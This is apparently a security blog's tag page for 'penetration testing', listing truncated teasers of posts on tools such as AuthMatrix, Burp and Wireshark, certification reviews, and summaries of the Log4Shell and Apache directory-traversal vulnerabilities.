Posts tagged with "penetration testing"
-
Using AuthMatrix to Find Access Control Issues
When testing a web app, an important area to focus on is access control. This can be tested using AuthMatrix, which is useful for testing multiple roles. This post will demonstrate how to use AuthMatrix to test for an access control issue using the Damn Vulnerable Web Application (DVWA). The...
-
Identifying Web App Technologies Using Wappalyzer
Wappalyzer is a browser extension for identifying technologies that are used by web apps. It is available for various browser platforms from here. For this demonstration, I will be running Wappalyzer by using the Firefox extension. With Wappalyzer installed, open a web app in the browser. Next, click the Wappalyzer...
-
Certified Az Red Team Professional: A Review
Introduction I recently passed the Certified Az Red Team Professional (CARTP) exam after going through the course: Attacking and Defending Azure AD Cloud from Pentester Academy. This course is taken before the CARTP exam and helps with developing an Azure pentesting methodology. This post will cover my experience in completing...
-
Using Wireshark to Troubleshoot Exploits
Wireshark has many use cases that are not only limited to networking. One example is using it to troubleshoot exploits, which makes it a useful addition to a pentester's toolset. This post will demonstrate how to use Wireshark to troubleshoot a phpMyAdmin remote code execution exploit (CVE-2018-12613). Burp Suite can...
-
An Insight into the Certified Red Team Operator 2021 Course
Introduction I passed the Red Team Operator (RTO) exam after going through the updated RTO course and labs. The RTO course covers red team principles such as adversary simulation, command and control and OPSEC considerations, while also focusing on internal penetration testing such as Active Directory attacks. This post will...
-
A Summary of the Log4j RCE Vulnerability (CVE-2021-44228)
A zero-day remote code execution vulnerability (CVE-2021-44228), named ‘Log4Shell’, was found that affects Log4j 2 versions 2.14.1 and below. Log4j is a logging library that is used in many Java applications. The vulnerability has been rated critical with a CVSS score of 10. The severity of this vulnerability is evident...
-
An Overview of the Apache Zero-Day Vulnerability (CVE-2021-41773)
Apache recently released patches for a zero-day vulnerability affecting versions 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE-2021-42013) of its web server on both Windows and Linux servers. The zero-day vulnerability was a directory traversal that could allow an attacker to access arbitrary files on the web server. Directory traversal (also known as...
-
Enumerating Internal Network Processes Using net-enum-listeners
One of the areas to focus on after getting an initial foothold on a machine is enumerating ports that are only accessible internally. Each port has a corresponding process that uses it. Important processes to focus on are those that are running as SYSTEM or as a privileged user, which...
-
OSCP Exam Guide: Preparing and Passing
I recently wrote a guide on how to prepare and pass the Offensive Security Certified Professional (OSCP) exam. The guide includes tips for the following stages: pre-OSCP, PWK labs, post-labs and exam. The guide was published on Hack South and can be found at the below link: https://hacksouth.africa/community/oscp-guide/
-
OSCP Enumeration Cheat Sheet
I created an enumeration cheat sheet, which I recently uploaded to GitHub. I used this cheat sheet for conducting enumeration during my OSCP journey. Additionally, this cheat sheet contains commands and tools that I used while preparing for the OSCP using platforms like Vulnhub and Hack the Box. Some of...
-
Automating Time-Based Blind SQL Injection using Bash
This post introduces a bash script that I wrote (time_blind_sqli.sh) during my OSCP journey that can be used to exploit time-based blind SQL injection in vulnerable parameters located in GET or POST requests. While the use of SQLmap is permitted in the PWK labs, it is important to understand how...
-
Using Burp Proxy to Troubleshoot Web Exploits
When running web exploits against a target, there are times where the exploit may fail to work and the output from the terminal may not give a descriptive error as to what the issue may be. The Burp Suite proxy can be used to troubleshoot why the exploit may not...